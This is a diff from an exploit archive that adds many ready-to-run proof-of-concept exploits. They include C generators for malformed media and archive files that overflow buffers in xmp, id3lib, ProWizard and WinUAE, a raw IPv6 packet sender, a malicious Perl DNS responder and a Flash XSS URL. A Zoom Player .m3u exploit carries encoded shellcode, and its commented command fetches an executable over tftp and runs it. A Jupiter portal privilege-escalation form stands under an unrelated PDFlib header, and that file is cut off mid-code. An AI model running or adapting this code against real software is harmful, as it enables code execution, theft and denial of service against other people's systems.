sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
(unsigned int*)&dest_mac[0], (unsigned
int*)&dest_mac[1],
(unsigned int*)&dest_mac[2], (unsigned
int*)&dest_mac[3],
(unsigned int*)&dest_mac[4], (unsigned
int*)&dest_mac[5]);
/* handle interface */
unsigned char *iface;
iface = argv[3];
/* buffer for ethernet frame */
void *buffer = (void*)malloc(MY_FRAME_LEN);
/* pointer to ethenet header */
unsigned char *etherhead = buffer;
struct ethhdr *eh = (struct ethhdr *)etherhead;
/* our MAC address */
unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55
};
unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};
/* prepare socket */
int s;
s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
printf("cannot create socket: [%d]\n",s);
exit(1);
}
/* RAW communication */
struct sockaddr_ll socket_address;
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_IP);
socket_address.sll_ifindex = if_nametoindex(iface);
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
socket_address.sll_halen = ETH_ALEN;
/* set the frame header */
memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
eh->h_proto = 0xdd86; // IPv6
/* the buffer we want to send */
unsigned char bad_buffer[] = {
0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };
memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);
/* overwrite our src and dst ip */
memcpy((void*)(buffer+22), (void*)src_ip, 16);
memcpy((void*)(buffer+38), dest_ip, 16);
/* send the buffer */
int send_result = 0;
send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct
sockaddr*)&socket_address, sizeof(socket_address));
if (send_result == -1) {
printf("could not send frame: [%d]\n", send_result);
exit(1);
}
else printf("frame send to ip [%s] with mac [%s] on iface
[%s]\n",argv[1],argv[2],argv[3]);
return 0;
}

157
platforms/linux/dos/30942.c Executable file
View file

@ -0,0 +1,157 @@
source: http://www.securityfocus.com/bid/27047/info
Extended Module Player (xmp) is prone to multiple local buffer-overflow vulnerabilities because it fails to perform adequate boundary checks before copying user-supplied input into an insufficiently sized buffer.
These issues occur when the application handles specially crafted OXM and DTT files.
Attackers can exploit these issues to execute arbitrary code that could compromise the affected computer. Failed attacks will likely cause denial-of-service conditions.
Extended Media Player 2.5.1 is vulnerable; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define VER "0.1"
#define BUFFSZ 8192
#define BOFCHR 0x41414141
#define BOF1SZ 380
#define BOF2SZ 3000
#define u8 unsigned char
int putmm(u8 *data, u8 *src, int len);
int putxx(u8 *data, unsigned num, int bits);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
int i,
attack;
u8 buff[BUFFSZ],
*fname,
*p;
setbuf(stdout, NULL);
fputs("\n"
"Extended Module Player <= 2.5.1 buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attack:\n"
" 1 = test_oxm, only *nix XMP reads this format (*.OXM)\n"
" 2 = dtt_load (*.DTT)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
p = buff;
if(attack == 1) {
printf("- test_oxm\n");
p += putmm(p, "Extended Module:", 16);
p += putmm(p, "", 60 - 16);
p += putxx(p, 14, 32); // hlen
p += putmm(p, "", 6);
p += putxx(p, 0, 16); // npat
p += putxx(p, 1, 16); // nins
p += putxx(p, -1, 32); // ilen
for(i = 0; i < 32; i++) {
*p++ = 0xff; // buf + 27 (nsmp)
} // force return
for(i = 0; i < BOF2SZ; i++) {
*p++ = BOFCHR & 0xff; // buf
}
} else if(attack == 2) {
printf("- dtt_load\n");
p += putxx(p, 'D', 8);
p += putxx(p, 's', 8);
p += putxx(p, 'k', 8);
p += putxx(p, 'T', 8);
p += putmm(p, "name", 64);
p += putmm(p, "author", 64);
p += putxx(p, 0, 32); // flags
p += putxx(p, 0, 32); // m->xxh->chn
p += putxx(p, 0, 32); // m->xxh->len
p += putmm(p, "", 8); // buf
p += putxx(p, 0, 32); // m->xxh->tpo
p += putxx(p, 0, 32); // m->xxh->rst
p += putxx(p, BOF1SZ, 32); // m->xxh->pat
p += putxx(p, 0, 32); // m->xxh->ins = m->xxh->smp
p += putmm(p, "", 3); // fread(m->xxo, 1, (m->xxh->len
+ 3) & ~3L, f);
for(i = 0; i < BOF1SZ; i++) {
p += putxx(p, BOFCHR, 32); // first buffer-overflow
}
for(i = 0; i < (((BOF1SZ + 3) >> 2) << 2); i++) {
*p++ = BOFCHR & 0xff; // second buffer-overflow
}
} else {
printf("\nError: wrong attack number (%d)\n", attack);
exit(1);
}
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
fwrite(buff, 1, p - buff, fd);
fclose(fd);
printf("- done\n");
return(0);
}
int putmm(u8 *data, u8 *src, int len) {
strncpy(data, src, len);
return(len);
}
int putxx(u8 *data, unsigned num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}
void std_err(void) {
perror("\nError");
exit(1);
}

10
platforms/linux/remote/30728.txt Executable file
View file

@ -0,0 +1,10 @@
source: www.securityfocus.com/bid/26273/info
Yarssr is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to inject and execute arbitrary malicious Perl code with the privileges of the user running the application. Successful exploits can compromise the application and possibly the underlying computer; other attacks are also possible.
Yarssr 0.2.2 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30728.rss

39
platforms/linux/remote/30895.pl Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/26902/info
The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.
Successfully exploiting this issue allows attackers to crash applications that use the affected module.
Net::DNS 0.60 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module
use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";
my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
while ($sock->recv($newmsg, $MAXLEN)) {
my($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
print "Client $hishost said ``$newmsg''\n";
$sock->send($oldmsg);
$oldmsg = "[$hishost] $newmsg";
}
die "recv: $!";

9
platforms/multiple/dos/30779.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26502/info
Rigs of Rods is prone to a remote buffer-overflow because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.
This issue affects Rigs of Rods 0.33d and prior versions.
http://www.exploit-db.com/sploits/30779.zip

9
platforms/multiple/dos/30791.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26516/info
Multiple denial-of-service vulnerabilities affect I Hear U because the application fails to handle specially crafted packets.
An attacker may leverage these issues to cause a remote denial-of-service condition in affected applications.
These issues affect versions prior to I Hear U 0.5.7.
http://www.exploit-db.com/sploits/30791.zip

9
platforms/multiple/dos/30856.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26771/info
Easy File Sharing Web Server is prone to a directory-traversal and multiple information-disclosure vulnerabilities.
Successfully exploiting these issues allows remote attackers to upload files to arbitrary locations and to access potentially sensitive information, which may aid in further attacks.
Easy File Sharing Web Server 4.5 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30856.zip

48
platforms/multiple/dos/30896.txt Executable file
View file

@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/26913/info
Appian Business Process Management Suite (BPMS) is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted packets.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users.
This issue affects Appian BPMS 5.6 SP1; other versions may be vulnerable as well.
\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x73\x61\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x31\x35\x39\x36\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x04\x03\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x73\x61\x69\x6e\x74\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x05\x73\x61\x69\x6e\x74\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x0a\x05\x00\x00\x00\x43\x54\x2d\x4c\x69\x62\x72\x61\x72\x79
\x0a\x05\x00\x00\x00\x00\x0d\x11\x00\x73\x5f\x65\x6e\x67\x6c\x69
\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x02\x01\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x69\x73\x6f
\x5f\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x35\x31\x32
\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33
\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00
\x00

100
platforms/multiple/dos/30903.c Executable file
View file

@ -0,0 +1,100 @@
source: http://www.securityfocus.com/bid/26945/info
The 'id3lib' library is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users.
This issue affects versions of id3lib committed to the CVS repository; other versions may also be affected.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define VER "0.1"
#define u8 unsigned char
#define MASK(bits) ((1 << (bits)) - 1)
int w28(u8 *data, unsigned num);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
int i;
u8 buff[1024],
*p;
setbuf(stdout, NULL);
fputs("\n"
"id3lib (devel CVS) array overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <output.MP3>\n"
"\n", argv[0]);
exit(1);
}
p = buff;
*p++ = 'I'; // "ID3"
*p++ = 'D';
*p++ = '3';
*p++ = 4; // ID3v2 4.0
*p++ = 0;
*p++ = 1 << 6; // flags: extended
p += w28(p, 0); // this->SetDataSize
p += w28(p, 0); // not used by id3lib
*p++ = 6; // extflagbytes
for(i = 0; i < 20; i++) {
*p++ = 0xcc;
}
printf("- create file %s\n", argv[1]);
fd = fopen(argv[1], "wb");
if(!fd) std_err();
fwrite(buff, 1, p - buff, fd);
fclose(fd);
printf("- done\n");
return(0);
}
int w28(u8 *data, unsigned num) {
const unsigned short BITSUSED = 7;
const unsigned MAXVAL = MASK(BITSUSED * 4);
int i;
if(num > MAXVAL) num = MAXVAL;
for(i = 0; i < 4; i++) {
data[4 - i - 1] = num & MASK(BITSUSED);
num >>= BITSUSED;
}
return(4);
}
void std_err(void) {
perror("\nError");
exit(1);
}

222
platforms/multiple/dos/30906.c Executable file
View file

@ -0,0 +1,222 @@
source: http://www.securityfocus.com/bid/26953/info
ProWizard 4 PC is prone to multiple stack-based buffer-overflow issues because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
These issues affect ProWizard 4 PC 1.62 and prior versions; other versions may also be vulnerable.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define VER "0.1"
#define BUFFSZ 0xffff
#define BOFCHR 0x58585858
#define u8 unsigned char
int putxx(u8 *data, unsigned num, int bits);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
int i,
j,
attack,
samp_off,
inst_off,
songs_off,
bofnum;
u8 *fname,
*buff,
*p,
*file_size;
setbuf(stdout, NULL);
fputs("\n"
"Pro-Wizard <= 1.62 multiple buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <output_file>\n"
"\n"
"Attack:\n"
" 1 = AMOS-MusicBank\n"
" 2 = FuzzacPacker\n"
" 3 = QuadraComposer\n"
" 4 = SkytPacker (unexploitable due to only one byte in a 32 bit array)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
fname = argv[2];
buff = malloc(BUFFSZ);
if(!buff) std_err();
memset(buff, 0, BUFFSZ);
p = buff;
songs_off = 256; // some values
samp_off = 256;
inst_off = 1024;
bofnum = 255;
file_size = NULL;
if(attack == 1) {
printf("- AMOS-MusicBank\n");
p += putxx(p, 'A', 8);
p += putxx(p, 'm', 8);
p += putxx(p, 'B', 8);
p += putxx(p, 'k', 8);
p += putxx(p, 0x00, 8);
p += putxx(p, 0x03, 8);
p += putxx(p, 0x00, 8);
p += putxx(p, 0x01, 8);
file_size = p; // BANK_LEN
p += 4;
p += putxx(p, 'M', 8);
p += putxx(p, 'u', 8);
p += putxx(p, 's', 8);
p += putxx(p, 'i', 8);
p += putxx(p, 'c', 8);
p += putxx(p, ' ', 8);
p += putxx(p, ' ', 8);
p += putxx(p, ' ', 8);
p += putxx(p, inst_off, 32); // INST_HDATA_ADDY
p += putxx(p, songs_off, 32); // SONGS_DATA_ADDY
p += putxx(p, 0, 32); // PAT_DATA_ADDY
p = buff + (songs_off + 0x14);
p += putxx(p, 1, 16);
p += putxx(p, 0, 32);
p = buff + (inst_off + 0x14);
p += putxx(p, bofnum, 16); // samples
for(i = 0; i < bofnum; i++) {
putxx(p, BOFCHR, 32);
p += 32;
}
putxx(file_size, (p - buff) - 12, 32);
} else if(attack == 2) {
printf("- FuzzacPacker\n");
p += putxx(p, 'M', 8);
p += putxx(p, '1', 8);
p += putxx(p, '.', 8);
p += putxx(p, '0', 8);
p += 2 + (68 * 31);
p += putxx(p, bofnum, 8); // PatPos
p += putxx(p, 0, 8); // NbrTracks
p = buff + 2118;
for(i = 0; i < (4 * bofnum * 4); i++) {
p += putxx(p, bofnum, 8);
}
p += putxx(p, BOFCHR, 32);
} else if(attack == 3) {
printf("- QuadraComposer\n");
bofnum = 32; // max 32
p += putxx(p, 'F', 8);
p += putxx(p, 'O', 8);
p += putxx(p, 'R', 8);
p += putxx(p, 'M', 8);
file_size = p;
p += 4;
p += putxx(p, 'E', 8);
p += putxx(p, 'M', 8);
p += putxx(p, 'O', 8);
p += putxx(p, 'D', 8);
p += putxx(p, 'E', 8);
p += putxx(p, 'M', 8);
p += putxx(p, 'I', 8);
p += putxx(p, 'C', 8);
p = buff + 22 + 41;
p += putxx(p, bofnum, 8);
for(i = 0; i < bofnum; i++) {
p[0] = i + 0x70;
putxx(p + 2, BOFCHR / 2, 16);
putxx(p + 30, BOFCHR, 32);
p += 34;
}
p += 1000;
putxx(file_size, (p - buff) - 8, 32);
} else if(attack == 4) {
printf("- SkytPacker\n");
p += 256;
p += putxx(p, 'S', 8);
p += putxx(p, 'K', 8);
p += putxx(p, 'Y', 8);
p += putxx(p, 'T', 8);
p = buff + 260;
p += putxx(p, bofnum - 1, 8);
for(i = 0; i < bofnum; i++) {
for(j = 0; j < 4; j++) {
p += putxx(p, BOFCHR, 8);
p += putxx(p, BOFCHR, 8);
}
}
p += 22529;
} else {
printf("\nError: wrong attack number (%d)\n", attack);
exit(1);
}
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
fwrite(buff, 1, p - buff, fd);
fclose(fd);
free(buff);
printf("- done\n");
return(0);
}
int putxx(u8 *data, unsigned num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
}
return(bytes);
}
void std_err(void) {
perror("\nError");
exit(1);
}

109
platforms/multiple/dos/30922.c Executable file
View file

@ -0,0 +1,109 @@
source: http://www.securityfocus.com/bid/26979/info
WinUAE is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
This issue affects versions prior to WinUAE 1.4.5.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define VER "0.1"
#define BOFSZ 10000 // 1000 + 8192 + the rest
#define BUFFSZ (BOFSZ + 32)
#define u8 unsigned char
int putsc(u8 *data, int chr, int len);
int putxx(u8 *data, unsigned num, int bits);
void std_err(void);
int main(int argc, char *argv[]) {
FILE *fd;
u8 *fname,
*buff,
*p;
setbuf(stdout, NULL);
fputs("\n"
"WinUAE <= 1.4.4 gunzip buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <output.ADZ>\n"
"\n", argv[0]);
exit(1);
}
fname = argv[1];
buff = malloc(BUFFSZ);
if(!buff) std_err();
p = buff;
p += putxx(p, 0x1f, 8); // header[0]
p += putxx(p, 0x8b, 8); // header[1]
p += putxx(p, 0x00, 8); // header[2]
p += putxx(p, 0x08, 8); // flags
p += putsc(p, 0x00, 6); // rest of the header
p += putsc(p, 'A', BOFSZ); // filename buffer-overflow
p += putxx(p, 0, 8); // NULL byte delimiter
p += putxx(p, -1, 32); // force the return
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
fwrite(buff, 1, p - buff, fd);
fclose(fd);
free(buff);
printf("- done\n");
return(0);
}
int putsc(u8 *data, int chr, int len) {
memset(data, chr, len);
return(len);
}
int putxx(u8 *data, unsigned num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}
void std_err(void) {
perror("\nError");
exit(1);
}

9
platforms/multiple/remote/30850.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26732/info
HFS HTTP File Server is prone to a vulnerability that lets attackers upload files and place them in arbitrary locations on the server. The issue occurs because the software fails to adequately sanitize user-supplied input.
A successful exploit may allow the attacker to upload malicious files and potentially execute them; this may lead to various attacks.
This issue affects versions prior to HTTP File Server 2.2b.
http://www.exploit-db.com/sploits/30850.zip

7
platforms/multiple/remote/30905.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/26949/info
Adobe Flash Player is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

59
platforms/multiple/remote/30933.php Executable file
View file

@ -0,0 +1,59 @@
source: http://www.securityfocus.com/bid/27007/info
Zoom Player is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users.
This issue affects Zoom Player 6.00 beta 2 and all releases contained in the Zoom Player 5 branch.
<?php
/*
Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh)
by Nine:Situations:Group::surfista
seems the same of http://secunia.com/advisories/28214/
bug found by Luigi Auriemma
no full working exploit out, so I made my test version
/*
/*
//original shellcode, 27 bytes + command
//re-encode with
//alpha2 --unicode ecx <sh.txt
$scode =
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
"\xbb\x0d\x25\x86\x7c". //WinExec, kernel32.dll XP SP3
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff".
"cmd /c tftp -i 192.168.0.1 GET s s.exe && s && ".
"\xff";
*/
$_scode="IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1".
"AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhkMC1Kn".
"QWPnpNQGP3XPCPJaCEkJmo5TFsLYoHSNQUpiXgxyoKOKOosPmOtKpNOQSKp1d36rTp".
"pkpNMpimPNQp9nRlnnQP6lxNNlplnP1MPPGQ524O0RSO02SnN35rXPeKpLfKvKp43kpkvmVMPkOA";
$buff="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f".
"\x77\x77\x77".
str_repeat("\x61",0xfe8).
/* unicode preamble, alignment */
"\x6e". //add byte ptr [esi],ch, nop equivalent [*]
"\xd3\x45". //0x004500d3 unicode friendly pop - pop - ret, zplayer.exe
"\x6e". //*
"\x05\x7f\x4c". //add eax,4c007f00h
"\x6e". //*
"\x2d\x59\x4c". //sub eax,4c005900h
"\x6e". //*
"\x50". //push eax
"\x6e". //*
"\x59". //pop ecx
str_repeat("\x6e\x90",0x7f). //nop
"\x6e". //*
"\x6a". //push 0, nop equivalent
$_scode.
str_repeat("\x90",0xbb8);
$_fp=@fopen("pwn.m3u","w+");
if (!$_fp) { die("[:(] Failed to create file...");}
fputs($_fp,$buff);
fclose($_fp);
print("[:)] Done!");
?>

144
platforms/php/remote/30928.php Executable file
View file

@ -0,0 +1,144 @@
source: http://www.securityfocus.com/bid/27001/info
PDFlib is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
PDFlib 7.02 is vulnerable; other versions may also be affected.
<?php
########################## WwW.BugReport.ir
###########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: Jupiter 1.1.5ex Privileges Escalation
# Vendor: http://www.jupiterportal.com
# original advisory: http://www.bugreport.ir/?/23
#######################################################################################
?>
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Jupiter 1.1.5ex Privileges Escalation</title>
<style type="text/css" media="screen">
body {
font-size: 10px;
font-family: verdana;
}
INPUT {
BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH:
1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009;
BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00;
BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH:
1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<body dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000"
text="#008000" vlink="#00c000">
<form method="POST" action="?">
Target URL (whit trailing slash) :<BR><BR>
http://<input type="text" name="target" value="www.example.com/jupiter/"
size="50"><BR><BR>
Username :<BR><BR>
<input type="text" name="username" size="30"><BR><BR>
Password :<BR><BR>
<input type="text" name="password" size="30"><BR><BR>
*First Create an account on target!<BR>
The exploit will login with this username and password and then grants
full access to this account!<BR><BR>
<input type="submit" name="start" value="Start">
</form>
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
function sendpacket($packet)
{
global $host, $html;
$port = 80;
$ock=fsockopen(gethostbyname($host),$port);
if ($ock)
{
fputs($ock,$packet);
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
fclose($ock);
// echo nl2br(htmlentities($html));
}else die('<BR>No response from '.htmlentities($host).'<BR>');
}
if(isset($_POST['start']))
{
if ($_POST['target'] == '' || $_POST['username'] == '' ||
$_POST['username'] == '')
{
die('Error : All fields are required!');
}
$Target = trim($_POST['target']);
$Username = trim($_POST['username']);
$Password = trim($_POST['password']);
$Target .= ($Target[strlen($Target)-1] <> '/') ? '/' : '';
$host = substr($Target, 0 ,strpos($Target, '/'));
$path = substr($Target, strpos($Target, '/'));
$Query1 = $path.'index.php';
$packet1 = "HEAD $Query1 HTTP/1.1\r\n";
$packet1 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet1 .= "Host: ".$host."\r\n";
$packet1 .= "Connection: Close\r\n\r\n";
sendpacket($packet1);
echo nl2br(htmlentities($html));
$Pattern = "(PHPSESSID=[a-z0-9]{20,32})";
if(preg_match($Pattern, $html, $Matches))
{
$Match = $Matches[0];
$PHPSESSID = substr($Match, 10, strlen($Match));
}
$Query2 = $path.'index.php?n=modules/login';
$packet2 = "POST
$Query2&username=$Username&password=$Password&submit=Login&PHPSESSID=$PHPSESSID
HTTP/1.1\r\n";
$packet2 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet2 .= "Host: ".$host."\r\n";
$packet2 .= "Connection: Close\r\n\r\n";
sendpacket($packet2);
if(stristr($html , 'i=1') == true)
{
die('Error : Incorrect username or password! Try
again!');
} else
if(stristr($html , 'i=5') == true)
{
die('Error : Someone is currently using that account!');
} else
$RandMail = substr($PHPSESSID, 10, 6).'_mail@none.com';
$Query3 =
